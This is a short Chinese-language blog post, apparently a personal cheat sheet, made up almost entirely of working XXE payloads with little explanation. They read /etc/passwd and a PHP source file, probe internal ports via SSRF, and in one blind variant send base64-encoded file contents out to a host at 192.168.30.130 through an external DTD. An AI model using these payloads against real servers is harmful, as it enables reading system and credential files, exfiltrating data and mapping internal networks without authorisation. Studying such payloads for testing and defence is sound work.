XXE

XXE

Posted by Kyon-H on August 6, 2023

XXE payload

1、有回显—读服务器文件:

1
2
3
4
5
6
<?xml version="1.0"?>
<!DOCTYPE ANY [
        <!ENTITY content SYSTEM "file:///etc/passwd">
        <!--<!ENTITY content SYSTEM "file:///c://Windows//System32//test.txt">-->
]>
<x>&content;</x>

2、无回显-读取文件

1
2
3
4
5
6
7
8
9
10
11
<?xml version="1.0"?>
<!DOCTYPE test [
        <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
        <!ENTITY % dtd SYSTEM "http://192.168.30.130:8081/test.dtd">
        %dtd;
        %send;
]>

test.dtd:
<!ENTITY % payload "<!ENTITY &#x25; send SYSTEM 'http://192.168.30.130:8081/?data=%file;'>">
%payload;

2、SSRF—探测端口:

适用于有回显和blind xxe,也是外部一般实体:

1
2
3
4
5
6
7
<?xml version="1.0"?>

<!DOCTYPE ANY [

    <!ENTITY content SYSTEM "http://10.165.89.150:88">]>

<name>&content;</name>

3、如果是php的话,可以用php的filter协议直接读出文件

1
2
3
4
5
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE r [ 
<!ELEMENT r ANY>
<!ENTITY goodies SYSTEM "php://filter/read=convert.base64-encode/resource=index.php"> ]> 
<creds>&goodies;</creds>